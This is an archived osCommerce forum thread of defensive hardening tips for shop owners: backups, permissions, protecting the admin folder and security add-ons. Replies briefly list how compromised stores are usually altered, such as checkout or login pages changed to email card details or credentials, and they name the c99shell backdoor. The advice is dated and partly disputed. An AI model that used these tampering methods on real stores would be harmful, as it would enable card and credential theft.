Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Archived

This topic is now archived and is closed to further replies.

php_Guy

What to do BEFORE you get hacked

Recommended Posts

Having your site hacked is a PITA. It can be far worse if you weren't prepared.

 

First off, store an entire set of working files locally. This should be a set of files that has never been off your computer so that you know that they have not been tampered with. Edit them locally, when you need to, and then upload them to your webspace, either through the file manager in your cpanel or with ftp, sftp, ssh, or something similar. You don't have to upload the entire set each time, just the modified files.

 

Some people edit their files live on the server. If you do this you will not have a current local copy. If you download the file(s) from your server, you do not know for certain that they have not been modified by a hacker. ALWAYS edit your local files and upload them to the server, not the other way around.

 

It wouldn't be a bad idea to get XAMPP (from Apache Friends) and develop locally as well but that's beyond the scope of this post.

 

Before installing a new mod, make a copy of the entire local directory and datestamp it (rename the directory copy to indicate the date). That way if anything goes wrong, you can revert to the old copy. It is a good idea to keep a couple of these snapshots (backups taken at different times) around just to be safe.

 

Now, if your site ever gets hacked it is easy to fix. Go to your webspace and delete all the files associated with your site. Use some common sense though. There may be other folders such as for cgi, logs, statistics, etc that you might want to keep. (They should not be in a web accessible location anyway but that's another issue). Once you have deleted your website from the server, upload the entire fileset from your local computer. Now, your website should be back to where it was before you got hacked. That should be a fairly quick and painless recovery process.

 

Do not upload your files over the existing files. You must delete everything first. Otherwise you will not remove any new files or folders that were added by the hacker.

 

That is step one: Preparing to recover from an attack.

 

Step two is protecting against an attack in the first place.

 

Most important... Set the permissions correctly! The documentation states that you should set the permissions on a few folders to 777. That is fine if you want to be hacked. If you follow those instructions, you WILL be hacked, it's just a matter of time.

 

Set the permissions on ALL folders to 755. If your host has PHP installed as CGI through phpSuExec (the proper method), then your site will run fine this way. If they have PHP installed as a module, you will get a warning from oscommerce saying that it is unable to write to the images folder. Setting permissions back to 777 will make the message go away but it will leave you open to an attack. Contact your host and ask them if they could change the way in which they install PHP. If they will not, you should immediately get a new host. This isn't an arbitrary statement. By installing PHP the wrong way, they have created a security vulnerability that you will not be unable to resolve. A partial work-around is to upload images via file manager in cpanel or through ftp. A less secure method is to set the permissions on the images folder to 777 just long enough to add your new products and then set it back to 755. This work-around does not, however, deal with the permissions issues on a couple of other folders. Loading PHP in the correct manner is the only fix.

 

Set the permissions on all files to 644, with two exceptions. There are two configure.php files. One is located in /catalog/includes/ the other is in /catalog/admin/includes/. The permissions on these two files should be 400, 444, or 644 dependent on your server configuration. Use the lowest setting that will still allow your store to function and that your host's setup allows you to set.

 

If you have trouble setting permissions on files or folders through ftp, try the file manager in cpanel instead. Some hosts don't allow ftp to change permissions.

 

The admin folder requires a password (in the latest version of osc). This method of password protection is not secure. A hacker could run a password cracker program against it and try thousands of passwords a second until they get in. Use the feature in cpanel to password protect your admin directory. When a hacker runs a password cracker program against this, the system will be notified after a set number of attempts and the hacker's IP will be automatically banned from the system (on a properly configured server. It wouldn't hurt to check this with your host).

 

Renaming your admin folder to something obscure (a 12+ character long string of random letters and numbers would be best) makes it even more difficult for hackers since they won't even know where your admin folder is now. You will have to modify your configure.php files to point to the newly renamed admin directory. Be sure that you do not list the new name in any other files (like robots.txt) as this will give the name away.

 

Lastly, install the following security mods:

 

Security Pro

Sitemonitor

IP Trap

.htaccess Protection

Anti-XSS

 

With all of those changes made, it is very unlikely that you will be hacked. There are always other methods of attack and some can only be prevented by making changes to the server configuration (which is out of your control). Keep in mind that shared-host accounts have more security issues than dedicated accounts and that "cheap" accounts are just that; don't expect that a cheap account is managed by competent or conscientious people.

 

Lastly, make sure that your admin settings for file-based sessions and cache (if you use either), do not use the /tmp folder if you are on a shared-host account. On most systems, the /tmp folder is a symlink to a shared system folder that all the other accounts on that shared-host also use. Not only can this potentially cause problems but it can be a security leak, sharing customer data through this shared folder

 

Hope that helps. Good luck!

Share this post


Link to post
Share on other sites
Thank u for information, it is realy helpful for new to this topic like myself:-)One question: How and where can I set up permission on a folder?...

 

You can use ftp or file manager in cpanel. Look for an option for 'permissions' or 'chmod'.

 

Also, it may help to google chmod to get a better understanding of permissions and what the various settings do.

 

hth

Share this post


Link to post
Share on other sites
How important is upgrading to RC1/RC2 security wise-from MS2.2?

 

Is MS2.2 with these additions secure enough?

 

Thanks :)

 

Those addons will probably be sufficient but I would suggest upgrading anyway. There were a lot of bug fixes though are worth getting.

Share this post


Link to post
Share on other sites

You could also add beware of what contributions you install because they often introduce hacker doorways. Esspecially the MS2.2 Admin Users in combination with the WYSIWYG Editor because you can access the editor without logging into Admin and then it is a hacker's delight.

 

You should also remove file manager and the language editor from Admin. Plus seriously consider removing the backup or never leaving a backup around because another HA HA admin hack is to restore an old copy of the database.

 

The most common hacked files are:

 

1. index.php to frame porn sites

2. .htacess + adding numeric.php in 777 folders to redirect 404 pages to porn sites

3. checkout_confirmation to email the CC details to a public email address

4. specific payment methods to also email the CC details to a public email address

5. login.php to steal the login information of a customer in the hope of getting CC details

6. admin login.php to steal the admin login details in the hope of getting CC details

7. database tables - adding tables as part of eBay motors type scams

 

 

And never ever ever install phpmyAdmin under your public_html folder like some people do to avoid using a hosting panel or when their cheap hosting does not provide it.

 

And the other one people always forget? Don't leave copies of forums or blog software that you installed just to have a look at lying around. Because if you don't keep them up to date you are also leaving yourself open to hacking.


Kym

Projects Director @ ozEworks.com

Share this post


Link to post
Share on other sites
hello,

if I have SSL 256 I still need to install the following security mods ?

 

SSL protects data transmissions by using a secure encryption method. It does absolutely nothing for the security of your website. That needs to be handled with .htaccess, passwords, permissions, and various other methods. So most definately install the security mods.

Share this post


Link to post
Share on other sites
thx 1 more que

 

By Renaming my admin folder

what files do i need to modify ?

 

Just the configure.php file so it has the path to the relocated directory.

Share this post


Link to post
Share on other sites

Thanks for the post, really helpful information to help keep your site protected.

Just started a new shop and installed all of these and working perfect ;)

Share this post


Link to post
Share on other sites
Guest

Thanks for all this info..! I'm now working on getting our webshop safe and secured.. I've renamed my admin folder and have modified the configure file that's in the admin folder. Now when I go to the new admin folder it can't find the files.. it goes to the login.php as if it was in the old folder.

 

Any ideas what I'm doing wrong?

 

(At first it looked like there weren't any configure.php files on my server, so I modified the files I have on my local backup and uploaded them. Now I downloaded the files directly from the webserver to see if they were correct, and they are..)

Share this post


Link to post
Share on other sites

I have been having problems with e-mail spammers modifying pages to integrate their bot e-mail scripts.

 

I am currently on MS2 but I'm going to switch to the RC version shortly.

 

Out of curiosity though, if I remove the File Manager function from the admin side, would it possible, and beneficial to set all my files to 444 permissions?

Share this post


Link to post
Share on other sites
Guest

thank you php-guy - Newb here - I changed all the permissions with FTP

 

I was unable to change the admin folder name to something more secure

 

when I renamed the admin folder, I couldn't find where in the configure.php in catalog\includes I needed to change the text from admin to the new folder name.

 

I was able to locate where i need to change the admin dir to the newly named one in catalog\admin\includes configure.php. Any help would be greatly appreciated.

 

With Kind Regards,

 

Brian

Share this post


Link to post
Share on other sites
Lastly, make sure that your admin settings for file-based sessions and cache (if you use either), do not use the /tmp folder if you are on a shared-host account. On most systems, the /tmp folder is a symlink to a shared system folder that all the other accounts on that shared-host also use. Not only can this potentially cause problems but it can be a security leak, sharing customer data through this shared folder

 

I just finished reading the OSC manual (2.2 RC2a) and it said to create a folder inside of the catalog folder and use it for cache. I did this using the absolute directory path. Is this safe?

 

I read the section on how to store sessions, but it lost me big time. I get that I don't want to use the /tmp file and it also said that you shouldn't put it in mysql. It said something about keeping it out of your docs root file....does this mean I can store them in an absolute directory path outside of the public folder? Like create a new directory in the root to store them? Can someone walk me through this?

Share this post


Link to post
Share on other sites

yes i didnt have any success in renaming my admin folder, i did rename it but when i try to log into my admin folders i just renamed it doesnt go through, i have changed the admin/includes/configure.php file to but not the include/configure.php because i couldnt find it. Plus when i change my name and all i try to log in but my ip gets logged cuz i have all of the security mods enable and it still doesnt go through. if you cuold plz help me that would be great. thanks in advance

Share this post


Link to post
Share on other sites
yes i didnt have any success in renaming my admin folder, i did rename it but when i try to log into my admin folders i just renamed it doesnt go through, i have changed the admin/includes/configure.php file to but not the include/configure.php because i couldnt find it. Plus when i change my name and all i try to log in but my ip gets logged cuz i have all of the security mods enable and it still doesnt go through. if you cuold plz help me that would be great. thanks in advance

 

So u must rename in admin/includes/configure.php

2 lines

1. define('DIR_WS_ADMIN', '/admin/'

2. define('DIR_FS_ADMIN', '/home/public_html/admin/

 

reupload.

Have fun

Ex:

 

OLD: www.mysite.com/admin

go to admin/includes/configure.php

rename the 2 lines in "mynewlogin"

go to admin folder, rename it in mynewlogin

 

browse www.mysite.com/mynewlogin

Share this post


Link to post
Share on other sites
Go to your webspace and delete all the files associated with your site.

 

do we have to delete the databases associated with?

Share this post


Link to post
Share on other sites

I can add my 2 cents

 

You should download all your public folder to your pc; during this process my avg antivirus detected the file that was a back-door for the hacker.

 

so in that way i could spot the problem files

Share this post


Link to post
Share on other sites

you don't need all this modules above3, you need a proper hosting with mod_security + firewall protection, 100% working and preventing hack attacks, I have whole database of IP addresses which are tried to hack my servers and various applications on it.


Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Share this post


Link to post
Share on other sites
You should download all your public folder to your pc; during this process my avg antivirus detected the file that was a back-door for the hacker.

the normal antivirus never detect the php back-doors, your 2cents is useless!!!! it's only in exe applications or services on the window os are have sort of back-doors which antivirus can detect!


Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Share this post


Link to post
Share on other sites
I can add my 2 cents

 

You should download all your public folder to your pc; during this process my avg antivirus detected the file that was a back-door for the hacker.

 

so in that way i could spot the problem files

If your site has hack code like this it will never get detected by an antivirus on your PC because to the PC it's just another text file.

 

It doesn't become a "virus" until it runs on a web server. And a "virus" on a website isn't what PC antivirus programs are designed to look for. Yours was probably a javascript virus. Now that they will detect.

 

About the only text files quarantined by a PC antivirus would probably be some malicious VB scripts.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites
If your site has hack code like this it will never get detected by an antivirus on your PC because to the PC it's just another text file.

 

It doesn't become a "virus" until it runs on a web server. And a "virus" on a website isn't what PC antivirus programs are designed to look for. Yours was probably a javascript virus. Now that they will detect.

 

About the only text files quarantined by a PC antivirus would probably be some malicious VB scripts.

 

it detected c99shell.php and c99.txt which were the cause of be hacked.

 

it works for me.

 

if hostmonster were have antivirus.... everything could be avoided

Share this post


Link to post
Share on other sites

×